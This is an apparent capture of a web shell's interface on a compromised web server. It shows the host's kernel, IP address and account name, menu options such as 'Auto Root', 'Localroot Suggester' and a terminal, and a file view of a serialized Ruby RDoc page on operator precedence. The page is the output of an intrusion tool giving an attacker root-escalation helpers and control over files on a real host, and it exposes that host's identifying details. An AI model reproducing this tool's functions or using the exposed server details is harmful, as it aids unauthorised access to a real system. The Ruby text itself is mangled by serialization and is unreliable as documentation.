Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
syntax /
Delete
Unzip
Name
Size
Permission
Date
Action
page-assignment_rdoc.ri
13.88
KB
-rw-r--r--
2023-07-26 17:38
page-calling_methods_rdoc.ri
11.75
KB
-rw-r--r--
2023-07-26 17:38
page-control_expressions_rdoc.ri
15.42
KB
-rw-r--r--
2023-07-26 17:38
page-exceptions_rdoc.ri
2.91
KB
-rw-r--r--
2023-07-26 17:38
page-literals_rdoc.ri
10.2
KB
-rw-r--r--
2023-07-26 17:38
page-methods_rdoc.ri
14.46
KB
-rw-r--r--
2023-07-26 17:38
page-miscellaneous_rdoc.ri
3.97
KB
-rw-r--r--
2023-07-26 17:38
page-modules_and_classes_rdoc.ri
10.18
KB
-rw-r--r--
2023-07-26 17:38
page-precedence_rdoc.ri
1.53
KB
-rw-r--r--
2023-07-26 17:38
page-refinements_rdoc.ri
7.7
KB
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::TopLevel[ i I"syntax/precedence.rdoc:EFcRDoc::Parser::Simpleo:RDoc::Markup::Document:@parts[S:RDoc::Markup::Heading: leveli: textI"Precedence;To:RDoc::Markup::BlankLine o:RDoc::Markup::Paragraph;[I"UFrom highest to lowest, this is the precedence table for ruby. High precedence ;TI"8operations happen before low precedence operations.;T@ o:RDoc::Markup::Verbatim;[.I"!, ~, unary + ;TI" ;TI"** ;TI" ;TI" unary - ;TI" ;TI" *, /, % ;TI" ;TI" +, - ;TI" ;TI"<<, >> ;TI" ;TI"& ;TI" ;TI" |, ^ ;TI" ;TI">, >=, <, <= ;TI" ;TI"<=>, ==, ===, !=, =~, !~ ;TI" ;TI"&& ;TI" ;TI"|| ;TI" ;TI" .., ... ;TI" ;TI" ?, : ;TI" ;TI"modifier-rescue ;TI" ;TI"=, +=, -=, etc. ;TI" ;TI"defined? ;TI" ;TI" not ;TI" ;TI" or, and ;TI" ;TI"Bmodifier-if, modifier-unless, modifier-while, modifier-until ;TI" ;TI"{ } blocks ;T:@format0o; ;[I"LUnary <code>+</code> and unary <code>-</code> are for <code>+1</code>, ;TI".<code>-1</code> or <code>-(a + b)</code>.;T@ o; ;[I"OModifier-if, modifier-unless, etc. are for the modifier versions of those ;TI"Bkeywords. For example, this is a modifier-unless expression:;T@ o;;[I"a += 1 unless a.zero? ;T;0o; ;[I"P<code>{ ... }</code> blocks have priority below all listed operations, but ;TI"8<code>do ... end</code> blocks have lower priority.;T@ o; ;[I"@All other words in the precedence table above are keywords.;T: @file@:0@omit_headings_from_table_of_contents_below0